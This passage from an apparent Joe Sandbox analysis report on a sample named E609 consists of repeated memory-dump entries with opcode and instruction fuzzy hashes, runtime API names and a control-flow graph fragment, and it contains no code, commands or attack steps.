                                                                                                  • Part of subcall function 04A5FC0C: std::regex_error::regex_error.LIBCPMT ref: 04A5FC74
                                                                                                  • Part of subcall function 04A5FC0C: __CxxThrowException@8.LIBCMT ref: 04A5FC82
                                                                                                  • Part of subcall function 04A5FC0C: std::exception::exception.LIBCMT ref: 04A5FC9B
                                                                                                  • Part of subcall function 04A5FC0C: __CxxThrowException@8.LIBCMT ref: 04A5FCB0
                                                                                                • _wcsstr.LIBCMT ref: 04A1EA0C
                                                                                                • _memset.LIBCMT ref: 04A1EE5C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw$_wcsstrstd::exception::exception$_memset$std::regex_error::regex_error
                                                                                                • String ID:
                                                                                                • API String ID: 1338678108-0
                                                                                                • Opcode ID: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                                                                                                • Instruction ID: 4eeadb23d58811850ca9ced5de5f74a6d799dec8767dfacf0dfe3c50241342e3
                                                                                                • Opcode Fuzzy Hash: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                                                                                                • Instruction Fuzzy Hash: 1152CE71A002199FDF24CF68C994BAEBBF1FF48304F148569E846AB291E731A945CB91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                                                                                                • Instruction ID: 40f2579c666ae376e2d95599b80ed57b1ea179c528ea86886739d2a1061def9e
                                                                                                • Opcode Fuzzy Hash: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                                                                                                • Instruction Fuzzy Hash: 2642AE71D04228DBEF14DFA8CA84BEEB7F5BF04308F244569E415A7290E731BA45DBA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                • Instruction ID: 6a22f1c693067667c975fc6b946844b1355ab4cc21c94bae91fadc8cbd97c0e7
                                                                                                • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                • Instruction Fuzzy Hash: 50525370E00219DFDB50DBA4C854FEEBBB5BF49704F148198E909AB2A0DB31BD45CBA0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $
                                                                                                • API String ID: 0-3993045852
                                                                                                • Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                                                                                                • Instruction ID: 39b6a93c31a56325a4ffa99cc2caaec4842247dc7d9958b1e34fd5566ff5f67e
                                                                                                • Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                                                                                                • Instruction Fuzzy Hash: 1B3250B1E00229AAEF619F64CC44BAEB7F9FF45704F0045EAE60CA6151DB749E80CF59
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
                                                                                                • Instruction ID: b2fecf76a5b10737ab06900659fdaf3cbc94d3c636d9949bea12ba38c1f18aa5
                                                                                                • Opcode Fuzzy Hash: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
                                                                                                • Instruction Fuzzy Hash: A042BF71629F159BC3DADF24C88055BF3E1FFC8218F048A1DD99997A90DB38F819CA91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
                                                                                                • Instruction ID: 9f3d1fc964501be7745bf230a96b4f923f147422840a9e001f568d6caf36998d
                                                                                                • Opcode Fuzzy Hash: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
                                                                                                • Instruction Fuzzy Hash: CF22EFB6905B128FC714CF29D18055AF7E1FF88324F158A6EE8A9A7B10D730BA55CF81
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                                                                                                • Instruction ID: 05d082330c416e67c06a532964af8df8e1104b9eb0c871c855bdc4d54a32604c
                                                                                                • Opcode Fuzzy Hash: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                                                                                                • Instruction Fuzzy Hash: CDF1B571344B058FC758DE5DDDA1B16F7E5AB88318F19C728919ACBB64E378F8068B80
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
                                                                                                • Instruction ID: 9b03e69b085882790a44db8b5e2764bfe6fe70391d8f6a30d64c454dc16f4cd8
                                                                                                • Opcode Fuzzy Hash: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
                                                                                                • Instruction Fuzzy Hash: 83025C715187058FC756EE0CD49035AF3E1FFC8305F19892DDA8987B64E73AA9198F82
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
                                                                                                • Instruction ID: 2d9473547b0795ef380de3f5893b0a9344097383df0c54b2778ee04da1df007b
                                                                                                • Opcode Fuzzy Hash: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
                                                                                                • Instruction Fuzzy Hash: 00C12833E2477906D764DEAF8C500AAB6E3AFC4220F9B477DDDD4A7242C9306D4A86C0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                                                                                                • Instruction ID: dab2fe87f4825cf01bdd4adeb0d852f5b99912dc3857324f0b7138209cbe3834
                                                                                                • Opcode Fuzzy Hash: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                                                                                                • Instruction Fuzzy Hash: F6A1DB0A8090E4ABEF455A7E90B63EBAFE9CB27354E76719284D85B793C019120FDF50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
                                                                                                • Instruction ID: 47aeaaac46cadc797a226e4c34e547b17c64e59c69488b17d9ed8be6dbaff1af
                                                                                                • Opcode Fuzzy Hash: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
                                                                                                • Instruction Fuzzy Hash: 3DB14D72700B164BD728EEA9DC91796B3E3AB84326F8EC73C9046C6F55F2BCA4454680
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                • Instruction ID: c60f6cb48c7dd5bc59ddef04d5ac20d055d3d0ec9fcb6519d06faad286d4a4af
                                                                                                • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                • Instruction Fuzzy Hash: CEC18CB5E003599FCB54CFA9C881ADEFBF1FF48310F24856AE919E7201E334AA558B54
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9479a41546b8b9daa844b3f0f9bcf180ed8e63d922313bf96b91a02671daf30e
                                                                                                • Instruction ID: 0762237f7efd1ddad5ae23a19de0831cb515b10da50b3a3f4b9c9e77ea4d5184
                                                                                                • Opcode Fuzzy Hash: 9479a41546b8b9daa844b3f0f9bcf180ed8e63d922313bf96b91a02671daf30e
                                                                                                • Instruction Fuzzy Hash: 40B183A0039FA686CBD3FF30911024BF7E0BFC525DF44194AD99986864EB3EE94E9215
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
                                                                                                • Instruction ID: 6821477f55c0f325375790ead95a5d75a25d1200e89a514167b1ebb1b20fed95
                                                                                                • Opcode Fuzzy Hash: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
                                                                                                • Instruction Fuzzy Hash: 52912673D187BA06D7609EAF8C441B9B7E3AFC4210F9B0776DD9467242C9309E0697D0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
                                                                                                • Instruction ID: e5e21642867f468ccfdba826a7d05696e40c1ad1a6ad3932163f7ea5d19501f1
                                                                                                • Opcode Fuzzy Hash: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
                                                                                                • Instruction Fuzzy Hash: 14B16AB5E002599FCB84CFE9C885ADEFBF0FF48210F64816AD919E7301E334AA558B54
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
                                                                                                • Instruction ID: b66e5351253be1ffcc35b13d79f45390111f3e961fd0614f6cf9631e3e56ba33
                                                                                                • Opcode Fuzzy Hash: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
                                                                                                • Instruction Fuzzy Hash: 3B71D473A20B254B8314DEB98D94192F2F1EF84610B57C27CCE85D7B41EB31B95A96C0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
                                                                                                • Instruction ID: b4a55a4e60e331f7f5dabcc845cfac8e9a9aeac6136a2c10ea1388790a9d9966
                                                                                                • Opcode Fuzzy Hash: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
                                                                                                • Instruction Fuzzy Hash: BE8127B2A047019FC328CF19D88566AF7E1FFD8210F15892EE99E93B41D770F8558B92
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
                                                                                                • Instruction ID: fb859924f281b99322f54b0fa5874f3909d4c25cab8a94c16667c08c0920fee1
                                                                                                • Opcode Fuzzy Hash: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
                                                                                                • Instruction Fuzzy Hash: A1710722535B7A06EBC3DA3D885046BF7D0BE4910AB850956DCD0F3181D72EDE4D77A4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
                                                                                                • Instruction ID: 505a55dc1df81b9a9041984826ff391d7b40468a5ae7480a4b7a3e9eebefe506
                                                                                                • Opcode Fuzzy Hash: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
                                                                                                • Instruction Fuzzy Hash: C58147B5A10B669BD754CF2AD8C046AFBF1FB08310B518A2ADCA583B40D334F565DFA4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
                                                                                                • Instruction ID: 29b2ce016fdd671b7e9db193a7f4a5029bc30ce4e5dbb8eaa6837fd0d503f3fb
                                                                                                • Opcode Fuzzy Hash: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
                                                                                                • Instruction Fuzzy Hash: 3161A3739046BB5BDB649E6DD8401A9B7A2BFC4310F5B8A75DC9823642C234EA11DBD0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
                                                                                                • Instruction ID: af19a77745d47d7486bfeadb3c1b16515f27130f9d90c1fac9738ec3eea75bca
                                                                                                • Opcode Fuzzy Hash: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
                                                                                                • Instruction Fuzzy Hash: 4D617C3791262B9BD761DF59D84527AB3A2EFC4360F6B8A358C0427642C734F9119BC4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
                                                                                                • Instruction ID: eaee83498a6cba454e25e4befdfd406fc3df78406aa435fb784600f297be98a0
                                                                                                • Opcode Fuzzy Hash: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
                                                                                                • Instruction Fuzzy Hash: CD51DD229257B945EBC3DA3D88504AEBBE0BE49206B460557DCD0B3181C72EDE4DB7E4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
                                                                                                • Instruction ID: f0ef39fb87bbcbabf7c087ccc32622f448b38fccad3fa450d398332d7bff4148
                                                                                                • Opcode Fuzzy Hash: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
                                                                                                • Instruction Fuzzy Hash: C4417C72E1872E47E34CFE169C9421AB39397C0250F4A8B3CCE5A973C1DA35B926C6C1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029088899.0000000004976000.00000040.00000020.00020000.00000000.sdmp, Offset: 04976000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4976000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                                                                                                • Instruction ID: cedd3eb0359b9ffdbdb49bf5be3280827c2a5792ea355c8e3559aa6e4d7868d1
                                                                                                • Opcode Fuzzy Hash: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                                                                                                • Instruction Fuzzy Hash: 10314935906246DFCB15CFB4D8D1AB5BB71EF87324F1989EDD4818B106D3257046C794
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
                                                                                                • Instruction ID: 0490d86b4bce045c3c4fd50df124024f9d30e3e971c92668636fd4ef92e6cccb
                                                                                                • Opcode Fuzzy Hash: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
                                                                                                • Instruction Fuzzy Hash: 40315E7682976A4FC3D3FE61894010AF291FFC5118F4D4B6CCD505B690D73EAA4A9A82
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
                                                                                                • Instruction ID: c6d5a10cdefc3c7a1378a4f2a2f69ba8ee16acbb9efcbb2e81ff0f3183a3abc5
                                                                                                • Opcode Fuzzy Hash: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
                                                                                                • Instruction Fuzzy Hash: E53124346183419FD741EF29D980A4BFBE5FFC8258F41D929F9889B221D730E985CB62
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                • Instruction ID: 48ab796a7bdbed55efb481c032341296661f288ceb3c0a0bfa3ed4f72222b51a
                                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                • Instruction Fuzzy Hash: BB112B7724104243D6548B3EE8B45B7E3E5EBC632B72C437AF1924B75CF122F1459600
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                                                                                • Instruction ID: 85ff5ec1f43bfdec84ae46c36f4700ad08d91ce0d3aa908c75ad09ed8ba4cc49
                                                                                                • Opcode Fuzzy Hash: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                                                                                • Instruction Fuzzy Hash: C9113D0A8492C4BDCF424A7840E56EBEFA58E2B218F4A71DA88C44B753D01B150FE7A1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                                                                                                • Instruction ID: 5f066b75f11ccd076322ac746b501ebfdaad11089c4b8fa547082bb8e1628648
                                                                                                • Opcode Fuzzy Hash: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                                                                                                • Instruction Fuzzy Hash: 670128B69106629BD701DF3EC8C045AFBF1BB082217528B2ADC9083A41D334F662DBE4

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 551 4a36437-4a36440 552 4a36442-4a36446 551->552 553 4a36466 551->553 552->553 555 4a36448-4a36459 call 4a39636 552->555 554 4a36468-4a3646b 553->554 558 4a3645b-4a36460 call 4a35ba8 555->558 559 4a3646c-4a3647d call 4a39636 555->559 558->553 564 4a36488-4a3649a call 4a39636 559->564 565 4a3647f-4a36480 call 4a3158d 559->565 570 4a364ac-4a364cd call 4a35f4c call 4a36837 564->570 571 4a3649c-4a364aa call 4a3158d * 2 564->571 568 4a36485-4a36486 565->568 568->558 580 4a364e2-4a36500 call 4a3158d call 4a34edc call 4a34d82 call 4a3158d 570->580 581 4a364cf-4a364dd call 4a3557d 570->581 571->568 589 4a36507-4a36509 580->589 586 4a36502-4a36505 581->586 587 4a364df 581->587 586->589 587->580 589->554
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_4a10000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                                                                                                • String ID:
                                                                                                • API String ID: 1442030790-0
                                                                                                • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                • Instruction ID: 155f0589ac46af17b3f35b559fb248f8dde7b621661d4ea55a22f4561ae57131
                                                                                                • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                • Instruction Fuzzy Hash: D021AE36A04600BEFB317F65DF01E4B7BE8DF4576BF608029F485550A0FB22B550CA50

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
